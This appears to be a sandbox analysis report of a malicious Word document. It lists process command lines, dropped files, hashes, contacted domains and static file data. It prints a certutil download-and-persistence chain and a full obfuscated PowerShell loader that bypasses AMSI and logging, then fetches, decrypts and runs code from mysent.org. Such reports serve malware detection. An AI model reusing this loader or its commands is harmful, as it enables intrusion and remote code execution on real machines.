findstr.exe (PID: 2592 cmdline: 'C:\Windows\system32\findstr.exe' /i JavaUpdateTaskCore MD5: 18F02C555FBC9885DF9DB77754D6BB9B)

certutil.exe (PID: 2528 cmdline: 'C:\Windows\System32\certutil.exe' -urlcache -split -f https://mysent.org/access.log.txt C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\sysmodule.hta MD5: 0D52559AEF4AA5EAC82F530617032283)

schtasks.exe (PID: 2624 cmdline: 'C:\Windows\system32\schtasks.exe' /Create /RL HIGHEST /F /SC DAILY /ST 11:10 /TN JavaUpdateTaskCore /TR C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\sysmodule.hta MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

taskeng.exe (PID: 2232 cmdline: taskeng.exe {180BD5BB-1663-4FC8-9FDE-050CD066A9C0} S-1-5-21-312302014-279660585-3511680526-1004:computer\user:Interactive:[1] MD5: 4F2659160AFCCA990305816946F69407)

powershell.exe (PID: 2428 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c '& $env:isjeuccptoxa ($env:jtkfvddqlpyc + $env:kulgweeimqae + $env:lvmhxfvjnrbg + $env:mwniywwkosci)' MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

cmd.exe (PID: 3096 cmdline: unknown MD5: AD7B9C14083B52BC532FBA5948342B98)

mshta.exe (PID: 2388 cmdline: C:\Windows\System32\mshta.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\sysmodule.hta' MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)

cmd.exe (PID: 480 cmdline: 'C:\Windows\System32\cmd.exe' /C 'set KjV= SeT-VarIABlE eiP ( [tYPe]('{7}{5}{1}{11}{0}{3}{2}{6}{8}{4}{10}{9}{12}' -F 'D','tioN','onArY','icti','tE','LlEC','[ST','cO','RinG,SYS','OBJ','M.','S.GenerIC.','eCT') ) ; ${tV`R`32} =[tYpE]('{2}{0}{3}{1}'-F'R','loCK','SC','iPtB') ; ${g`Nf} = [type]('{1}{0}' -F'f','RE') ; Set-iTeM ('vAriaB'+'le:R'+'tHA'+'C5') ( [type]('{7}{6}{5}{3}{2}{1}{8}{0}{4}'-f'N','epOi','Ic','v','aGER','et.sEr','Tem.n','sys','NTma') ); seT qcj ( [tyPe]('{1}{3}{6}{4}{5}{0}{2}' -F'uE','sY','st','sTE','WeB','rEQ','M.Net.') ) ; sET-iTem VAriAblE:eSY ( [tyPE]('{1}{0}{4}{2}{3}' -F'YsTeM.NeT.','S','DEN','TIALCAchE','CRe'));set-iTem VARIaBLe:r4imz ( [type]('{2}{4}{0}{3}{1}'-F 'T.EN','iNg','SysTem.te','cOD','X') ) ;If(${pS`Vers`ionTa`Ble}.'P`SVersION'.'MaJ`OR' -GE 3){${g`PF}= ${G`Nf}.'aSsE`mb`Ly'.('{1}{0}' -f'tTYPe','GE').Invoke(('{6}{1}{0}{3}{2}{4}{7}{5}' -f'na','tem.Ma','nt.Autom','geme','ati','.Utils','Sys','on')).'GETFiE`LD'(('{0}{4}{2}{1}{3}'-f 'cachedGr','Setti','icy','ngs','oupPol'),'N'+('{0}{4}{2}{3}{1}' -f 'o','tic','c,St','a','nPubli'));If(${g`Pf}){${G`PC}=${g`Pf}.('{1}{0}{2}'-f 'VaL','Get','Ue').Invoke(${nu`Ll});IF(${g`pc}[('{1}{0}{2}'-f 'rip','Sc','tB')+('{0}{3}{2}{1}' -f 'lo','ogging','kL','c')]){${G`PC}[('{2}{0}{1}' -f'rip','tB','Sc')+('{2}{3}{0}{1}' -f'in','g','lockL','ogg')][('{3}{1}{0}{2}'-f 'ip','eScr','tB','Enabl')+('{0}{2}{1}'-f'lo','ing','ckLogg')]=0;${G`Pc}[('{2}{1}{0}'-f'iptB','r','Sc')+('{0}{2}{1}' -f'l','kLogging','oc')][('{3}{7}{0}{4}{2}{1}{6}{5}'-f'crip','nLo','Invocatio','Enabl','tBlock','ing','gg','eS')]=0}${V`Al}= ( VArIaBle Eip -vAL )::('{0}{1}' -f 'Ne','w').Invoke();${V`AL}.('{1}{0}'-f'dD','A').Invoke(('{0}{1}{3}{2}'-f'En','a','leScriptB','b')+('{2}{1}{0}' -f'gging','ckLo','lo'),0);${v`Al}.('{0}{1}' -f'A','Dd').Invoke(('{0}{8}{6}{5}{2}{3}{1}{4}{7}' -f 'E','Log','o','ckInvocation','g','Bl','bleScript','ing','na'),0);${g`PC}[((('{8}{12}{14}{15}{9}{5}{0}{6}{7}{3}{4}{10}{13}{1}{16}{2}{17}{11}' -f'Po','sTK','el','KSW','ind','TKS','liciesTKSMicrosof','tT','HKEY_LO','are','o','iptB','CAL_MACHIN','w','ETK','SSoftw','SPowerSh','lTKSScr'))-REpLace ([CHAR]84+[CHAR]75+[CHAR]83),[CHAR]92)+('{1}{2}{0}'-f 'ging','loc','kLog')]=${v`AL}}ELse{ ${tvr`32}.'GeTFiE`LD'(('{1}{2}{0}' -f 'es','si','gnatur'),'N'+('{2}{1}{0}'-f'Static','c,','onPubli')).('{2}{0}{1}' -f 'TV','Alue','Se').Invoke(${N`ULL},(^&('{3}{0}{1}{2}' -f 'ew-Ob','Je','ct','N') ('{4}{3}{0}{1}{2}{5}{6}' -f'Ns.','GENEric.HAShSE','t[','lLeCtIO','Co','strI','ng]')))} ( ItEM ('vARi'+'A'+'BL'+'e:gNF') ).'Va`LUE'.'aSS`EM`BLy'.('{1}{0}{2}'-f 'yp','GetT','E').Invoke(('{4}{0}{3}{6}{1}{5}{2}'-f 'anag','msi','ils','emen','System.M','Ut','t.Automation.A'))^|^&('?'){${_}}^|^&('%'){${_}.('{2}{1}{0}'-f 'd','FieL','GEt').Invoke(('{4}{0}{1}{3}{2}'-f 'a','il','d','e','amsiInitF'),('{1}{4}{2}{0}{3}' -f 'ic,Stati','NonPu','l','c','b')).('{1}{0}'-f'ue','SETVAL').Invoke(${n`ULL},${TR`Ue})};}; ( gi ('vArIabLE:rt'+'ha'+'C'+'5')).'v`AlUE'::'expEC`T`100conTin`Ue'=0;${wc}=^&('{1}{2}{0}' -f 'BjECt','NEw-','O') ('{2}{5}{3}{4}{1}{0}' -f'nt','Ie','SYST','eb','CL','EM.NET.W');${u}=('{0}{13}{12}{1}{9}{4}{8}{16}{15}{2}{14}{5}{11}{17}{7}{3}{6}{10}' -f 'Mozi','(Wind',' T','e G','ws','i','e','11.0) lik','NT','o','cko','dent/7','.0 ','lla/5','r','; WOW64;',' 6.1','.0; rv:'); ${R`TH`Ac5}::'SeRVERCEr`T`i`FiCateVALIDat`i`On`cAll`B`ACk' = {${t`Rue}};${Wc}.'HEAd`ERs'.('{1}{0}' -f 'd','Ad').Invoke(('{1}{3}{0}{2}'-f '-Ag','Us','ent','er'),${u});${wC}.'p`ROxY'= (Gci VaRIablE:qCj ).'va`lue'::'D`eFAU`ltW`EbPROXY';${Wc}.'prO`Xy'.'C`REdent`ia`LS' = ( DiR VARIable:Esy ).'Va`lUE'::'dEFAu`LtNETWoRk`C`Re`DENTIals';${k}= ( Get-vaRiablE R4Imz -VAl )::'aS`CIi'.('{0}{1}'-f 'GEtBy','tEs').Invoke(('{2}{1}{4}{6}{0}{3}{5}'-f'cee5aa0e8b08','3','d20923','89bb','c','1e','7d7d7a'));${r}={${D},${K}=${AR`Gs};${s}=0..255;0..255^|.('%'){${j}=(${j}+${S}[${_}]+${k}[${_}%${K}.'COU`NT'])%256;${S}[${_}],${s}[${J}]=${s}[${j}],${s}[${_}]};${d}^|.('%'){${I}=(${I}+1)%256;${h}=(${h}+${S}[${I}])%256;${s}[${I}],${S}[${H}]=${s}[${h}],${s}[${i}];${_}-BxOR${s}[(${s}[${i}]+${S}[${h}])%256]}};${wC}.'Hea`D`ErS'.('{0}{1}' -f'AD','D').Invoke(('{1}{0}'-f'e','Cooki'),('{6}{2}{7}{8}{3}{5}{1}{4}{0}' -f 'ZB5Q=','mklQ','ssion=B43mgp','o69GDp','pT','3P','se','Q','4N'));${S`eR}=('{1}{2}{3}{5}{4}{6}{0}'-f':443','h','ttps:','//','nt','myse','.org');${t}=('{3}{4}{2}{1}{0}'-f'min.php','d','/a','/m','odules');${d`ATA}=${w`c}.('{1}{0}{2}' -f'NLOAdDaT','DOW','A').Invoke(${S`eR}+${t});${iV}=${D`ATA}[0..3];${DA`TA}=${dA`TA}[4..${d`Ata}.'L`eN`GTh'];-JoiN[ChAR[]](^& ${R} ${da`Ta} (${IV}+${k}))^|.('{0}{1}' -f'I','EX') && sET OMWI=ecHo IEX (GI enV:Kjv).valUe ^|powERSHeLl -nOnInTeRac -eXecUTiOn byPASs -NOeX -NoPRofiL -WiN hIddEN -&& CMD.ExE /C%OmWi%' MD5: AD7B9C14083B52BC532FBA5948342B98)

cmd.exe (PID: 2256 cmdline: CMD.ExE /C%OmWi% MD5: AD7B9C14083B52BC532FBA5948342B98)

cmd.exe (PID: 2364 cmdline: unknown MD5: AD7B9C14083B52BC532FBA5948342B98)

cleanup

Created / dropped Files

C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\5bea9e94d980f5a0363aa8b2c1455ae6_041d84af-7e76-450d-8340-55db3c73c359
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Size (bytes):	2320
Entropy (8bit):	7.5598285301750785
Encrypted:	false
MD5:	ECF1135FC249DF05D1580422F99A66B7
SHA1:	02450A5429850D0D4FF96FB064463D56FD828ACF
SHA-256:	35FF1EAFB20B5A306E3A4E6EDE44C8F6B3771259B33352F44315DF9358CA0896
SHA-512:	905662EF6F3C833EECC3E9928810F9ED60CFB458F95FEA299029FEB11AC735EF4EE4FD2DFF770DBEE25BE6638458EBE7A064DF0169B448812DBC055A2C8378F9
Malicious:	false
Reputation:	low

C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\99dabfea4a41e7fc6fe50eee51602f36_041d84af-7e76-450d-8340-55db3c73c359
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Size (bytes):	2320
Entropy (8bit):	7.563137103672031
Encrypted:	false
MD5:	9E5731300918654B629CF9AF9F05D000
SHA1:	9FC01EFA4D5E214E2AB3FC6B4F75544DD19C7138
SHA-256:	682198472D9785B5D2F80FF7A049013E5859D9C6BE3208BC99C3FB0EA047DDAC
SHA-512:	3731FC321252AD7B5BEB47C90CC439A162FF19E72D546C686F01F0AC66160F485D51419677EE4ACA028A90DF42C30F7E84C8585EEB24FD81ADFD249AF100BDAB
Malicious:	false
Reputation:	low

C:\Users\user~1\AppData\Local\Temp\6999265.cvr
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	1732
Entropy (8bit):	3.5190074837130765
Encrypted:	false
MD5:	879B6D7C780206E07350396138E10B45
SHA1:	AC18F7FDA5830DFE5997421DAEF5D954E8A9CAA9
SHA-256:	A38F7FF8783E5CA8BABFC44E8EC9555AF3977B7EA7721DA07C51F7215EC0959E
SHA-512:	6A4724DCBE202E2CB73E7357A9065AC7AE1A2C7E7B8BF6BC051EA8B0F7D9FECC7FCC352CEB53ED59DCEC43485D48B6006DF9449EAF6576F5BC2BB32A6786E867
Malicious:	false
Reputation:	low

C:\Users\user~1\AppData\Local\Temp\Word8.0\MSForms.exd
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	182128
Entropy (8bit):	4.345447158625558
Encrypted:	false
MD5:	B0B0EBC58FA856706333196C1D0F3E0D
SHA1:	B625C92375100904EA0F36D69CA2BFFF5D447569
SHA-256:	A484F805123D865FB3CD586E37C738ED9AF2590B4AF8FE13026B760899605A3B
SHA-512:	2114277B61D601D09C04F78DBF6A03DF46DE0F0B404ADC95449D6DEF996320B576DF57B7BA71CD43AAFADAE0041E0E97B6A74F4BDD30AD5B2F411CFC8022A1D1
Malicious:	false
Reputation:	low

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\580A98AB00459B6800754CE6A4E140AE
Process:	C:\Windows\System32\certutil.exe
File Type:	ASCII text, with very long lines
Size (bytes):	5376
Entropy (8bit):	5.449223203115029
Encrypted:	false
MD5:	1F4A85B59DC7399A67B5513E5A28599F
SHA1:	C1C4EA82D325284E26FD0FDC0D7C219E7BB6CFE9
SHA-256:	5F6B6A4614F3A2E2037C9FC16BF91DC05491488DF25F2D4EE97398F9784FA373
SHA-512:	32FD8505B2AEB2FB91A8722B57AE9AA76703125184C36B16B059A013EBD468EB0CFE92EF879005DD24D647342BBF9288C0A6213762736EA6B9347763A3EF0164
Malicious:	false
Yara Hits:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\580A98AB00459B6800754CE6A4E140AE, Author: Florian Roth
Reputation:	low

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\580A98AB00459B6800754CE6A4E140AE
Process:	C:\Windows\System32\certutil.exe
File Type:	data
Size (bytes):	184
Entropy (8bit):	2.55313546344931
Encrypted:	false
MD5:	BFEDBEA7F26B9A7ED032720B1B11880E
SHA1:	5204442104CFBE797A5D92D166514867C87CDAC4
SHA-256:	9DC0B0EAAA89F4D8071DAD497A8739395580E3734AAF80620A815D5DACF91D69
SHA-512:	DB01CE685E89FB470C28BB17D873243E2CB19A8416AF0C59C08E296ED1F919B74CCAEC765C27FCF4E9BA30AAB0F17F6D42D438C097CEA3A2793B1EBC154E9659
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Ringtones\libsys.hta
Process:	C:\Windows\System32\certutil.exe
File Type:	ASCII text, with very long lines
Size (bytes):	5376
Entropy (8bit):	5.449223203115029
Encrypted:	false
MD5:	1F4A85B59DC7399A67B5513E5A28599F
SHA1:	C1C4EA82D325284E26FD0FDC0D7C219E7BB6CFE9
SHA-256:	5F6B6A4614F3A2E2037C9FC16BF91DC05491488DF25F2D4EE97398F9784FA373
SHA-512:	32FD8505B2AEB2FB91A8722B57AE9AA76703125184C36B16B059A013EBD468EB0CFE92EF879005DD24D647342BBF9288C0A6213762736EA6B9347763A3EF0164
Malicious:	false
Yara Hits:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ringtones\libsys.hta, Author: Florian Roth
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R03ZXFR8\access.log[1].txt
Process:	C:\Windows\System32\certutil.exe
File Type:	ASCII text, with very long lines
Size (bytes):	5376
Entropy (8bit):	5.449223203115029
Encrypted:	false
MD5:	1F4A85B59DC7399A67B5513E5A28599F
SHA1:	C1C4EA82D325284E26FD0FDC0D7C219E7BB6CFE9
SHA-256:	5F6B6A4614F3A2E2037C9FC16BF91DC05491488DF25F2D4EE97398F9784FA373
SHA-512:	32FD8505B2AEB2FB91A8722B57AE9AA76703125184C36B16B059A013EBD468EB0CFE92EF879005DD24D647342BBF9288C0A6213762736EA6B9347763A3EF0164
Malicious:	false
Yara Hits:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R03ZXFR8\access.log[1].txt, Author: Florian Roth
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Y2YPC48Z\access.log[1].txt
Process:	C:\Windows\System32\certutil.exe
File Type:	ASCII text, with very long lines
Size (bytes):	5376
Entropy (8bit):	5.449223203115029
Encrypted:	false
MD5:	1F4A85B59DC7399A67B5513E5A28599F
SHA1:	C1C4EA82D325284E26FD0FDC0D7C219E7BB6CFE9
SHA-256:	5F6B6A4614F3A2E2037C9FC16BF91DC05491488DF25F2D4EE97398F9784FA373
SHA-512:	32FD8505B2AEB2FB91A8722B57AE9AA76703125184C36B16B059A013EBD468EB0CFE92EF879005DD24D647342BBF9288C0A6213762736EA6B9347763A3EF0164
Malicious:	false
Yara Hits:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Y2YPC48Z\access.log[1].txt, Author: Florian Roth
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CBBC92DF.wmf
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ms-windows metafont .wmf
Size (bytes):	2316
Entropy (8bit):	3.381655385936209
Encrypted:	false
MD5:	CB860577D3F924417C70E24F7BD46B0A
SHA1:	6D58118B13D96395E6D97FB5845627ACB09B9B2A
SHA-256:	B25F2C93753B855D3D84DD5C1F3E2C73A4CAC96147EF17839556D9A22E5EB5C6
SHA-512:	19FF43BF8F4388C97458C7392863CE7F556DD4619C08CE290F44B67057B03B4C28F219E5886697B7D432F9B5EC2AE00C1C9BC3BD0550359F1B5B64CDF9975640
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D2DF4F54.wmf
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ms-windows metafont .wmf
Size (bytes):	2334
Entropy (8bit):	3.369590607726791
Encrypted:	false
MD5:	C84D8D18DC985DF8CE7B8293F850692B
SHA1:	69F44686BE81508BA42FA04D3DF756C272C81D5F
SHA-256:	D4518CD18C385E051F61326A777993E6B9FCCCF855769939338A0A8B0D7BC238
SHA-512:	AEB27879E0B786F2F3445195E225E3293DAA650EFC578967EDD35F72F7AC044393DE819A30AA5A49A00912342F4778A9BC7F3E1EF795A354100CDE2387085ECE
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{50704F21-A918-4226-AC80-D4EED43B9EE9}.tmp
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	1536
Entropy (8bit):	1.1790044014506307
Encrypted:	false
MD5:	1A034BA2D4885D258E3B5769E62CE846
SHA1:	172ACCBE6F227C5025638940EAB2C842CDC1E612
SHA-256:	6879966A98C9D99DC952F4F09AD6F594842C39C0BF53ECC86F38F3D2AF17220F
SHA-512:	98C8406C64ACE123DFD3EF795B5B275B96CD54E3FEF433D902940E3C6BD0FCF2050074DBB5E571D54D3600726FF4190BECD516997CD497C3DFACD96062002C8B
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{64F9B154-0DF4-462C-A71F-FBF83CB08667}.tmp
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\AppCrash_WINWORD.EXE_18eb6f3de4f436a7565c28dc54d49aac4f613993_088af895\Report.wer
Process:	C:\Windows\System32\WerFault.exe
File Type:	data
Size (bytes):	14808
Entropy (8bit):	3.727836440951699
Encrypted:	false
MD5:	274381CF0C21E9B028A4FDCFB0AF6C42
SHA1:	17ED90D78F1C27D6CFFD5C275766EFC5EE30D66D
SHA-256:	2A455D533510205BE3C0BD3E73A820064E5F3D4302FD5262C57AC768C60DBBC4
SHA-512:	87CBF18933F31D966F3742DFFF1FA14B34CC801190608E0A51D795376C17709E4298E888F1EAE0818FAEB033823FD151949665F5E32223485AE2C3208E01129B
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\sysmodule.hta
Process:	C:\Windows\System32\certutil.exe
File Type:	ASCII text, with very long lines
Size (bytes):	5376
Entropy (8bit):	5.449223203115029
Encrypted:	false
MD5:	1F4A85B59DC7399A67B5513E5A28599F
SHA1:	C1C4EA82D325284E26FD0FDC0D7C219E7BB6CFE9
SHA-256:	5F6B6A4614F3A2E2037C9FC16BF91DC05491488DF25F2D4EE97398F9784FA373
SHA-512:	32FD8505B2AEB2FB91A8722B57AE9AA76703125184C36B16B059A013EBD468EB0CFE92EF879005DD24D647342BBF9288C0A6213762736EA6B9347763A3EF0164
Malicious:	false
Yara Hits:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\sysmodule.hta, Author: Florian Roth
Reputation:	low

C:\Users\user\AppData\Local\Temp\WERDF50.tmp.WERInternalMetadata.xml
Process:	C:\Windows\System32\WerFault.exe
File Type:	XML document text
Size (bytes):	3408
Entropy (8bit):	3.6722674111499836
Encrypted:	false
MD5:	77FED787A262E7429E1E827737FA22BE
SHA1:	C58943D408A5CE33244E64F5DC3F1AAD3E1DBB28
SHA-256:	538A4436048361A4807B7874924C76F32E2D108023E5472B55FDE00D485BB930
SHA-512:	96B211B7B5E4C5A325A46944E0026569729E3E4D9F660FFBA38D5144B5D8F187BFFC6D37709CB281799DDAA679A5C25B7CE31BA66A0C6E0969034630699344A2
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Spiez CONVERGENCE.LNK
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut
Size (bytes):	2136
Entropy (8bit):	4.5724100750542656
Encrypted:	false
MD5:	E975141585958E27EA0839C3883453E1
SHA1:	80B72066F2A41BD1C6F5C545704C6A0EE7473954
SHA-256:	EA264276877945F3A007073256051BC50A44E3206864276D79C42FBA45899E87
SHA-512:	1F82A1FAEA701CF833D57068853A1C6AD74FA9E4708F624FA2FD0340D3EFCA6E5A7C8D4BB6A5695D58F2CC0AB29E281DAE3EC2FA811B6E3B33504953BCCFE55B
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Size (bytes):	68
Entropy (8bit):	4.679015230797143
Encrypted:	false
MD5:	2D7CC1000C6ED92C4A7CFE798F6898FC
SHA1:	489D4DDAFCAFADA7487342AC2E256A8280DDEB71
SHA-256:	87C42928793D3FADD42E4E1119CE55180C7478C0D732134B443C094049BC5C8F
SHA-512:	3D16344029E6B5CD5D83C2EAD27B1F24466766CD75F1355284969786C969B888999502532CC9A925C70DF2F0A656CF5470827D6AF4F51D10F4BDDBB9204C5271
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	162
Entropy (8bit):	3.0533002338986908
Encrypted:	false
MD5:	3A3E7B526DD1EA756248EECF00D95C85
SHA1:	1B522388FFB02AB5D6E3584E6006920ABC2C99E1
SHA-256:	A440103B6049BB189D518234B4EACE519D8BAAC4232E030DD7426D4CB4A5CA97
SHA-512:	E703CF0A39581F4F0A57E84D6ADB0F1B8C81D50C070111BF775C77F8A8DA3CCDAFE232421E7C6518EA51653F45757F4C94BAEF96179CD951D1CFE07BB7AB5AA2
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\083ER46B0GQYCKTLIPWK.temp
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Size (bytes):	8016
Entropy (8bit):	3.5488285442926357
Encrypted:	false
MD5:	4333E5DB8A9C6571AFC5295892AA1C49
SHA1:	7ADD15067F37A907837A55B8705AA6B193DFC274
SHA-256:	57C44553DA3A144B5553D80036F835394C6E9846692E23860528F150FCF593F5
SHA-512:	475FFE04F42C9C6E6ABE355AF17DB362BA565E932C02AB090697A651619C8423467F145622EABB58098B0E0B4B3B285F892AC3DCEF435CA8F684574ECBD575BD
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7CIZPP3GJ9C47V881BZF.temp
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Size (bytes):	8016
Entropy (8bit):	3.550196279519329
Encrypted:	false
MD5:	B113FFDFD6F1A5F1E01ED90DC6C34560
SHA1:	EB63B5008F79DBE3204C7C4622C01CA39AA8C4CD
SHA-256:	F520848FA980378C541C143420FBFA8CB190DCDCFAC59675080C481985B42C2E
SHA-512:	E400695747E6A523F6429D4E35D7526503D5C7286965BE48DD88699AA01A12C1C8A51C47819FA08E50F451474981644BA55DADF8BF3DDF3C63E8C26B8A06EB6D
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K7NSG30EJYFWLW2HI02C.temp
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Size (bytes):	8016
Entropy (8bit):	3.548976528092697
Encrypted:	false
MD5:	4AF4B29DCEA9568207162AA9EF3B29ED
SHA1:	446F30A3555C6870DF0F4A6520E5999D92D50505
SHA-256:	5EC365CD437119C21C53FE5B6E9E891BF6EFFC71EF0FABF4BC7BDD3A35C7C7F3
SHA-512:	8DAFD53EB9F677A4960B7BF9F813B77BD098793607C0C57FBE3925F64529B07EA6013D03C60EF207EA69DED3FB4B174D808D5A48FA889FD5EAAB44443EE5AE65
Malicious:	false
Reputation:	low

C:\Users\user\Desktop\~$iez CONVERGENCE.doc
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	162
Entropy (8bit):	3.0533002338986908
Encrypted:	false
MD5:	3A3E7B526DD1EA756248EECF00D95C85
SHA1:	1B522388FFB02AB5D6E3584E6006920ABC2C99E1
SHA-256:	A440103B6049BB189D518234B4EACE519D8BAAC4232E030DD7426D4CB4A5CA97
SHA-512:	E703CF0A39581F4F0A57E84D6ADB0F1B8C81D50C070111BF775C77F8A8DA3CCDAFE232421E7C6518EA51653F45757F4C94BAEF96179CD951D1CFE07BB7AB5AA2
Malicious:	false
Reputation:	low

stdout
Process:	C:\Windows\System32\schtasks.exe
File Type:	ASCII English text, with CRLF line terminators
Size (bytes):	81
Entropy (8bit):	4.475015745222144
Encrypted:	false
MD5:	7746852C9597F5807527CC2B74630AB2
SHA1:	0F974E755CFF4E5A4C940A0DEE57B99431104693
SHA-256:	CAA5B8879D6ED17D0D6A3B0E64808F758FEDD325BFCA8B4DB88F6AC327A6A8AD
SHA-512:	CCF12DC2E85287204AD237EE79C18C96AE85C610BC8AD12A26768DC53741290727629B6317D3E8852612C4CD95AE8387C522938AA656BBD36F590F249033EAFA
Malicious:	false
Reputation:	low

Contacted Domains/Contacted IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
mysent.org	188.241.39.220	true	true	7%, virustotal, Browse	unknown
dgdadq.dm.files.1drv.com	131.253.33.213	true	false	0%, virustotal, Browse	high
api.onedrive.com	204.79.197.213	true	false	0%, virustotal, Browse	high

Contacted URLs

Name	Process
https://mysent.org/access.log.txt	C:\Windows\System32\certutil.exe
https://dgdadq.dm.files.1drv.com/y4mLDnW_sdiYZdrKuP_hiNnzpiLk2TKmTpCsB8gTSB6nzLeQ5XI6zgdcTjR3JG3Poj0uB4PFybzxs8PnowL5t489i5OJYPLU1pFu0EfBu2R-TNgGUEBJrDX6xp0txVyQUcI1vVcyu6-6Ytt0A_2SLJjd9KGnvOs0gS38Yc972-fShnY6NOZB_GJMLZNHGwfgo2STbA3YPaoscB3eIa7eLbNlA/STAGE0-PS.txt	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
https://mysent.org/modules/default.php	C:\Windows\System32\certutil.exe
https://mysent.org/hpmys.txt	C:\Windows\System32\certutil.exe
https://api.onedrive.com/v1.0/shares/s!ArI-XSG7nP5zbTpZANb3-dz_oU8/driveitem/content	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
https://mysent.org/modules/main.php	C:\Windows\System32\certutil.exe
https://mysent.org/modules/admin.php	C:\Windows\System32\certutil.exe

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Country	ASN	ASN Name	Malicious
188.241.39.220	Belize	200039	HYDRACOM-ASGB	true
131.253.33.213	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCK-MicrosoftCorporationUS	false
204.79.197.213	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCK-MicrosoftCorporationUS	false

Static File Info

General
File type:	CDF V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: john, Template: Normal.dotm, Last Saved By: john, Revision Number: 4, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Sun May 13 16:02:00 2018, Last Saved Time/Date: Sun May 13 16:32:00 2018, Number of Pages: 2, Number of Words: 580, Number of Characters: 3306, Security: 0
Entropy (8bit):	7.77607623735744
TrID:	Microsoft Word document (32009/1) 48.12% Microsoft Word document (old ver.) (19008/1) 28.57% Generic OLE2 / Multistream Compound File (8008/1) 12.04% Visual Basic Script (6000/0) 9.02% Java Script embedded in Visual Basic Script (1500/0) 2.25%
File name:	Spiez CONVERGENCE.doc
File size:	392192
MD5:	0e7b32d23fbd6d62a593c234bafa2311
